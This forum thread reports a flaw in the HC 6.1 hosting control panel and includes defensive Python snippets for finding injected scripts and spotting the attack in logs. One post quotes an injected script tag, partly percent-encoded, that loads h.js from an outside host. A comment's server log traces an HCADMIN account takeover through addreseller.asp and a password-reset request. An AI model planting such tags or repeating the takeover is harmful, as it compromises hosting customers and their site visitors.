2008/03/12 22:19:46
nitaish

Bug in HC 6.1

Hello,

There is a bug in the HC 6.1 version because of which all the default pages created by HC in the websites are getting injected with a script, which goes as follows:

<script src=http://yrwap.cn/h.js></script><script src=http://%79%72%77%61%70%2E%63%6E/h.js></script><script src=http://%79%72%77%61%70%2E%63%6E/h.js></script>

We request HC to look into it and fix it before it creates further problems.

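An added example (not nitaish's code or HC's) of the check a hosting operator can run over page files to find injected tags of the shape quoted above; it assumes nothing about HC beyond that tag shape, and its sample page is constructed, with the hypothetical host evil.example standing in for the one in the post:

```python
import re
from urllib.parse import unquote, urlsplit

# The injected tag in the post is unquoted and repeats its host in %-encoded form,
# so the pattern accepts unquoted values and hosts are compared after decoding.
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)

def external_script_hosts(html, allowed_hosts):
    """Return lower-cased hosts of <script src=...> tags that are not in allowed_hosts.
    Percent-decoding first makes http://%65%76... and its plain spelling compare equal."""
    found = set()
    for raw in SCRIPT_SRC.findall(html):
        host = urlsplit(unquote(raw)).hostname  # None for relative paths like /menu.js
        if host and host.lower() not in allowed_hosts:
            found.add(host.lower())
    return found

# Constructed page: an HC-style default page with an injection appended (hypothetical
# host evil.example, written once plainly and once %-encoded, as in the post).
SAMPLE_PAGE = """<html><head><title>Welcome</title>
<script src="/scripts/menu.js"></script></head><body>Site under construction
<script src=http://evil.example/h.js></script><script src=http://%65%76%69%6C%2E%65%78%61%6D%70%6C%65/h.js></script>
</body></html>"""
```

Run it over every default page HC wrote and treat any host outside your own allowlist as a compromise indicator, not just the one spelling the injection happens to use.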
1 comment
nextmill
There is a serious flaw in HC6.1 hf3.3 with post security updates (1/23/2008) that still hasn't been fixed... It was supposed to be fixed in the post hf 3.3 security fixes but was not fully fixed. Hackers continue to exploit this flaw and it seems HC doesn't care.

Here is the log of a recent exploit from TODAY on one of our customers' servers. The hacker is on IP 85.9.111.21 today. These logs show the hacker exploiting addreseller.asp to change the email address on the HCADMIN user, then getting the form to send a password change link to that email address. I WISH HC would disable the ability to request a 'sent password' for HCADMIN; it would probably be 1-2 lines of code to look and see if someone submitting such a request is asking to check the password for 'HCADMIN'.


2008-12-06 20:31:54 W3SVC3 RAPTOR9 216.115.x.x POST /hosting/addreseller.asp htype=3 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 475 802 687
2008-12-06 20:31:57 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/accountactions.asp ActionType=AddUser&hostingplantype=3&auto=1 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 553 607 1984
2008-12-06 20:34:09 W3SVC3 RAPTOR9 216.115.x.x GET /hosting/xml_addresellerresult.asp AddResult=70500010|-|ASP_0113|Script_timed_out 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 500 0 64 0 588 131437
2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 114468
2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 101843
2008-12-06 20:34:10 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 64 0 748 87000
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /Check_Password.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/ 216.115.x.x:8077 302 0 0 433 713 33765
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /hosting/addreseller.asp htype=3 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 475 802 12203
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x POST /accounts/AccountActions.asp ActionType=UpdateUser 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 511 748 10187
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x GET /main.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/ 216.115.x.x:8077 200 0 0 1357 579 671
2008-12-06 20:34:12 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/accountactions.asp ActionType=AddUser&hostingplantype=3&auto=1 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 302 0 0 553 607 703
2008-12-06 20:34:16 W3SVC3 RAPTOR9 216.115.x.x GET /Header.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/main.asp 216.115.x.x:8077 200 0 0 2308 589 4125
2008-12-06 20:34:17 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/AccountManager.asp UpdateResult=70500141&iconwebsite= 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 200 0 0 13455 597 5109
2008-12-06 20:34:27 W3SVC3 RAPTOR9 216.115.x.x POST /Check_Password.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/ 216.115.x.x:8077 302 0 1236 0 713 90531
2008-12-06 20:36:24 W3SVC3 RAPTOR9 216.115.x.x GET /hosting/xml_addresellerresult.asp AddResult=70500010|-|ASP_0113|Script_timed_out 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII - 216.115.x.x:8077 500 0 0 680 588 131000
2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /Header.asp - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Header.asp 216.115.x.x:8077 200 0 0 2308 531 129484
2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/bgDotted.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 200 0 0 296 591 453
2008-12-06 20:36:26 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/spacer.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 200 0 0 290 589 453
2008-12-06 20:36:29 W3SVC3 RAPTOR9 216.115.x.x GET /space.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 404 0 64 0 562 3578
2008-12-06 20:36:29 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/angle.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Header.asp 216.115.x.x:8077 200 0 0 345 586 2781
2008-12-06 20:36:30 W3SVC3 RAPTOR9 216.115.x.x GET /skins/PanelXP/Blue/images/TopImage.gif - 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/Contents.asp 216.115.x.x:8077 200 0 0 1085 591 609
2008-12-06 20:36:30 W3SVC3 RAPTOR9 216.115.x.x GET /accounts/AccountManager.asp UpdateResult=70500141&iconwebsite= 8077 - 85.9.111.21 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.0.4)+Gecko/2008102920+Firefox/3.0.4 showlinks=0;+showhelp=1;+Language=English;+SkinID=Blue;+TemplateID=PanelXP;+Skin=Blue;+cookie%5Ftest=true;+ASPSESSIONIDACQTRACS=JKJDEAHBHOBFALDHGKJAPBII http://216.115.x.x:8077/accounts/AccountManager.asp?UpdateResult=70500141&iconwebsite= 216.115.x.x:8077 200 0 0 13455 635 132968


2008/06/12 17:22:44
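An added defender-side example (not code from the post or from HC) that replays the sequence nextmill describes over IIS W3C log lines: it assumes the 22-field layout of the quoted log, keys on client IP, and uses constructed sample lines with TEST-NET addresses in place of the post's real ones.

```python
from collections import defaultdict
from datetime import datetime, timedelta
# 22-column W3C layout of the quoted log (spaces inside values appear as '+').
FIELDS = ("date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query "
          "s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) "
          "cs-host sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken").split()
# Takeover steps from the comment: (method, lower-cased uri-stem, lower-cased query fragment or None)
SEQUENCE = [("POST", "/hosting/addreseller.asp", None),
            ("POST", "/accounts/accountactions.asp", "actiontype=updateuser"),
            ("POST", "/check_password.asp", None)]

def parse_line(line):
    """Map a log line to a dict of FIELDS plus parsed 'ts'; None for #-directives or bad column counts."""
    parts = line.split()
    if line.startswith("#") or len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
    return rec

def find_takeover_sequences(lines, window=timedelta(minutes=10)):
    """Return (client_ip, time_of_last_step) per client whose requests match SEQUENCE in order within `window`."""
    progress = defaultdict(lambda: (0, None))  # c-ip -> (next step index, time of first matched step)
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        step, started = progress[rec["c-ip"]]
        if started is not None and rec["ts"] - started > window:
            step, started = 0, None  # partial sequence went stale; start over
        method, stem, query = SEQUENCE[step]
        if (rec["cs-method"] == method and rec["cs-uri-stem"].lower() == stem
                and (query is None or query in rec["cs-uri-query"].lower())):
            step, started = step + 1, started or rec["ts"]
            if step == len(SEQUENCE):
                hits.append((rec["c-ip"], rec["ts"]))
                step, started = 0, None
        progress[rec["c-ip"]] = (step, started)  # unrelated requests (images, repeats) leave state as is
    return hits
def w3c(date, time, method, stem, query, client_ip, status):
    """Build a constructed 22-field line modeled on the post's log (UA and cookie shortened)."""
    return " ".join([date, time, "W3SVC3", "RAPTOR9", "192.0.2.10", method, stem, query,
                     "8077", "-", client_ip, "HTTP/1.1", "Mozilla/5.0", "ASPSESSIONID=EXAMPLE",
                     "-", "192.0.2.10:8077", status, "0", "0", "475", "802", "687"])
# Constructed sample: one client walks the three steps, a second client is benign.
SAMPLE_LOG = [
    w3c("2008-12-06", "20:31:54", "POST", "/hosting/addreseller.asp", "htype=3", "203.0.113.5", "302"),
    w3c("2008-12-06", "20:31:57", "GET", "/accounts/accountactions.asp", "ActionType=AddUser&auto=1", "203.0.113.5", "302"),
    w3c("2008-12-06", "20:34:10", "POST", "/accounts/AccountActions.asp", "ActionType=UpdateUser", "203.0.113.5", "302"),
    w3c("2008-12-06", "20:34:12", "POST", "/Check_Password.asp", "-", "203.0.113.5", "302"),
    w3c("2008-12-06", "20:35:00", "GET", "/main.asp", "-", "198.51.100.7", "200"),
]
```

A hit is a reason to inspect the HCADMIN contact address and recent password-reset mail, which is the change the comment asks HC to make impossible in the first place.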